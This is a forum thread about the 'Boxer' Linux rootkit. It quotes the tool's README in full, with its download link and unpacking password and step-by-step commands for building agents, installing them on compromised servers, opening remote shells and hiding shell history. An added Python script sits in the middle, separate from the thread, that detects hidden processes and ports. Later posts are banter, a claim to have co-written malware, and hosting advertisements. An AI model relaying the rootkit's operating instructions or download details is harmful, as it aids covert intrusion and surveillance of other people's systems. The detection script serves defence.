#1, 08-02-07, 12:06
BOD Member
 
Join Date: Jul 2007
Posts: 296
0day linux 2.6 rootkit in the wild

http://www.securityfocus.com/archive/75/473510

Quote:
I found one interesting tool on my server, with the
name 'Boxer 0.99 BETA3'. It's protected by ELFuck
linux executables obfuscator. Google doesn't know
anything about it.
Now, it is available at http://surfall.net/rel.tar.gz
(ELFuck password: 'notdead')
In the tar.gz

Quote:
BOXER
This technical information is being provided for evil purposes only

==
VERSION
0.99 BETA3


==
FEATURES
* Hidden process creation (hidden sockets (tcp/udp/unix/raw), hidden procfs info). Suckit style hidden files.
* Remote control interface.
- Authentication using RSA2048 keys.
- TCP-channel encryption with AES256 and RC4.
- Multiple (parallel) virtual connections inside one "physical" TCP-connection. Each virtual connection can serve one of the following tasks:
a. remote command execution
b. shell sessions
c. file upload/download
d. Connections with other BOXER-servers and tunneling them to the client (creation connection chains: client->server1->server2).
* Tty sniffing
* Reboot-safe
* Ability to run 3rd party binaries (attached to main agent binary) when server reboots.
* Run on x86 32bit machines (kernel: 2.4.*, 2.6.* including 2.6.21).


==
USING BOXER
Main boxer binary can be used in two modes: interactive and non-interactive. To enter interactive mode you can simply run main boxer binary "./boxer".
First of all you need agent binary (binary to install to owned boxes) with attached public key:
* Create RSA keypair
* Create agent binary

a. key creation
* Create private key:
"./boxer keygen key_pvt"
OR (interactive)
"rksh />keygen key_pvt"
* Extract public key part:
"./boxer keypub key_pvt key_pub"
OR
"rksh />keypub key_pvt key_pub"
* Create keypack with the set of our public keys:
"./boxer keypack key_pack key_pub1 key_pub2 key_pub3"
OR
"rksh />keypack key_pack key_pub1 key_pub2 key_pub3"

b. agent-binary creation
* Create agent-binary
"./boxer conf"
OR
"rksh />conf"
* Attach keypack file to agent-binary. (OPTIONAL) Attach binary file (RECOMMENDED: statically linked binary) to agent-binary. That binary will start with agent-binary.
"./boxer gen ./agent ./key_pack ./exec_bin exec_arg1 exec_arg2"
OR
"rksh />gen ./agent ./key_pack ./exec_bin exec_arg1 exec_arg2"


==
LOADING AND INSTALLING

"Load" - load agent binary into RAM without any filesystem changes. Agent will be online until first reboot. "Install" - make agent to "go online" after reboots. There are two ways to "load" and "install" binary:

* Loading with automatic install. In this case agent will be loaded into RAM and installed into system to autoload after reboots:
"./agent x"
(YOU CAN RUN ./agent x ONLY ON FRESH MACHINES - WITHOUT LOADED BOXER)

* Loading with manual install. Agent will be loaded into RAM:
"./agent s"
If you want to install the binary, you should connect to the box and type the following command in interactive mode:
"rksh box>install"
With manual install you can test boxer on your boxes. If it works stable, you can later "install" it.


==
USING CLIENT

* Connecting to boxer-hosts.

1. You can connect to any open port. Client has the ability to scan remote host for open ports. To use this feature you need to set up port list to scan:

"rksh />set con ports 21 22 25 53 80 110 111"

2. Also you can define RSA key, that will be used by default in authentication process:

"rksh />set con key ./key_pvt"

3. And limit of connection attempts:

"rksh />set con tries 2"

4. After setting parameters connect to servers:

"rksh />open www.backdoored.box:80"
"rksh www.backdoored.box>open second.backdoored.box"

* Using shell

1. Define shell binary to execute on the remote side:

"rksh />set sh bin /bin/bash"

2. Create local profile file to use with shell:

"
cat <<EOF > profile.boxer
> ulimit -S -c 0 > /dev/null 2>&1
>
> PATH=/bin:/sbin:/usr/bin:/usr/sbin
> HISTFILE=/dev/null
> USER="`id -un`"
> LOGNAME=$USER
> HOSTNAME=`/bin/hostname`
> TERM=xterm
>
> export PATH HISTFILE USER LOGNAME HOSTNAME TERM
> id
> w
> EOF
"

3. Load profile:

"rksh />set sh rc ./profile.boxer"

4. Enter shell:
"rksh www.backdoored.box>sh new"
5. Switch back to "rksh":
Ctrl+7


* Startup file

cat <<EOF > startup
set con ports 21 22 25 53 80 110 111
set con key ./key_pvt
set con tries 2
set sh bin /bin/bash
set sh rc ./profile.boxer
EOF

"rksh />run ./startup"


OTHER FEATURES
in interactive mode type:
"rksh />help"
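The README above advertises two kinds of hiding, PIDs filtered out of /proc and sockets filtered out of the procfs network tables, and the "load" mode keeps the agent in RAM with no file to find. What a responder can still do on a suspect box is compare the filtered views against what the kernel answers to direct syscalls: kill(pid, 0) for processes and bind(2) for TCP ports, the same cross-view idea the unhide tools use. The script below is an added example, not part of the forum post, the securityfocus mail or the Boxer tool; it assumes Linux with /proc mounted and is most useful as root (non-root bind() cannot test ports below 1024). The probe functions are injectable so the comparison logic can be exercised with constructed data.

```python
#!/usr/bin/env python3
"""Cross-view check for hidden PIDs and hidden TCP sockets.

Added example, not from the Boxer README or the thread.  Assumed: Linux with
/proc mounted; run as root for full coverage.  It compares what the (possibly
filtered) /proc views show against what the kernel answers to direct
syscalls: kill(pid, 0) for processes and bind(2) for TCP ports.
"""
import errno
import os
import socket

# --- processes -------------------------------------------------------------

def listed_pids(proc="/proc"):
    """PIDs that readdir(/proc) shows, i.e. what ps and top are built on."""
    return {int(name) for name in os.listdir(proc) if name.isdigit()}

def pid_alive(pid):
    """Ask the kernel directly whether `pid` exists.  Signal 0 delivers nothing:
    ESRCH means no such process, EPERM means it exists but is not ours."""
    try:
        os.kill(pid, 0)
        return True
    except ProcessLookupError:        # ESRCH
        return False
    except PermissionError:           # EPERM: exists, owned by someone else
        return True

def read_pid_max():
    try:
        with open("/proc/sys/kernel/pid_max") as fh:
            return int(fh.read())
    except (OSError, ValueError):
        return 32768                  # historical default

def hidden_pids(listed, probe=pid_alive, pid_max=None):
    """Walk the whole PID space; return PIDs the kernel confirms but `listed` lacks.
    `probe` is injectable so the logic can be exercised without a live system."""
    pid_max = pid_max or read_pid_max()
    return sorted(pid for pid in range(1, pid_max + 1)
                  if pid not in listed and probe(pid))

# --- sockets ---------------------------------------------------------------

def listed_local_ports(proc_net_tcp_text):
    """Every local port in a /proc/net/tcp (or tcp6) dump, in any state.
    Columns: sl local_address rem_address st ...; addresses are hex IP:PORT."""
    ports = set()
    for line in proc_net_tcp_text.splitlines()[1:]:        # skip header
        fields = line.split()
        if len(fields) >= 4:
            ports.add(int(fields[1].rsplit(":", 1)[1], 16))
    return ports

def port_in_use(port):
    """bind() to the port; EADDRINUSE means some socket, listed or not, owns it.
    Returns None when we lack privilege to tell (EACCES on ports < 1024)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.bind(("0.0.0.0", port))  # wildcard also conflicts with 127.0.0.1:port
        return False
    except OSError as exc:
        if exc.errno == errno.EADDRINUSE:
            return True
        if exc.errno == errno.EACCES:
            return None
        raise
    finally:
        sock.close()

def hidden_tcp_ports(listed, probe=port_in_use, ports=range(1, 65536)):
    """Ports the kernel refuses to hand out but which no /proc/net/tcp* line claims."""
    return sorted(p for p in ports if p not in listed and probe(p))

if __name__ == "__main__":
    listed = set()
    for table in ("/proc/net/tcp", "/proc/net/tcp6"):
        try:
            with open(table) as fh:
                listed |= listed_local_ports(fh.read())
        except OSError:
            pass
    print("hidden PIDs:     ", hidden_pids(listed_pids()))
    print("hidden TCP ports:", hidden_tcp_ports(listed))
```

Two caveats before trusting the output. A process that starts between the /proc listing and the kill() walk shows up as a false positive, so rerun and keep only PIDs that appear twice. And the check only works as long as the rootkit filters procfs rather than hooking kill() and bind() themselves; a kernel-level implant that lies at the syscall boundary will pass this test, and the README's UDP, unix and raw socket hiding is not covered here at all. When the output is empty but the box still behaves oddly, the next step is to image it and examine it from a clean boot rather than to keep asking the running kernel.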
#2, 08-02-07, 14:13
BOD Member
 
Join Date: Nov 2006
Posts: 271

Security should be of the utmost importance. Continue, Taslayer.
#3, 08-03-07, 20:43
BOD Member
 
Join Date: Jul 2007
Posts: 296

What part of "I'm a C|EH" don't you all get?
#4, 08-13-07, 07:48
BOD Member
 
Join Date: Nov 2006
Posts: 271

Yeah, we are aware of it.

I am the best Linux tech...
#5, 08-13-07, 15:54
BOD Member
 
Join Date: Jul 2007
Posts: 296

Well, Linux tech, tell me the processes that are running on your box ;)
#6, 08-14-07, 10:32
Administrator
 
Join Date: Jul 2007
Posts: 85

Yes, Linux tech, you should tell us the processes that taslayer asked about ;)
#7, 08-14-07, 21:14
BOD Member
 
Join Date: Jul 2007
Posts: 296

Just a little info on me for people who don't know:
I was arrested at the age of 10 and banned from all electronics for 3 years. Also, I am one of the creators of win32.randex.
#8, 08-15-07, 06:08
BOD Member
 
Join Date: Nov 2006
Posts: 35

Quote:
Originally Posted by taslayer View Post
Just a little info on me for people who don't know:
I was arrested at the age of 10 and banned from all electronics for 3 years. Also, I am one of the creators of win32.randex.
Nice little introduction about your achievements ;) and that too at an early age.
#9, 08-15-07, 09:10
BOD Member
 
Join Date: Jul 2007
Posts: 16

It's amazing that at so small an age you had done such a big job. :eek:
#10, 08-15-07, 09:53
Moderator
 
Join Date: Oct 2005
Posts: 346

LOL

Great work!!!
#11, 08-27-07, 11:37
BOD Member
 
Join Date: Jul 2007
Posts: 296

Yup, thank you :P
#12, 09-15-07, 11:28
BOD Member
 
Join Date: Nov 2005
Location: New Mexico
Posts: 273

Thanks, Tas, and post some more topics on security.
#13, 09-17-07, 05:41
BOD Member
 
Join Date: Jul 2007
Posts: 128

Nice post! Keep on posting.
#14, 09-17-07, 10:29
Moderator
 
Join Date: Oct 2005
Posts: 346

Check out the features of server management techniques provided by bodhost -

http://www.bodhost.com/dedicated_ser...nagement.shtml
#15, 09-18-07, 07:38
BOD Member
 
Join Date: Oct 2005
Posts: 117

Yes, I had seen that; it's interesting.
#16, 09-18-07, 11:42
Moderator
 
Join Date: Oct 2005
Posts: 346

So, al, what did you learn from it... hehe
#17, 09-19-07, 06:20
BOD Member
 
Join Date: May 2007
Posts: 81

bodhost's support is excellent and they are providing service with the latest technology. In short, I want to say Bodhost is best.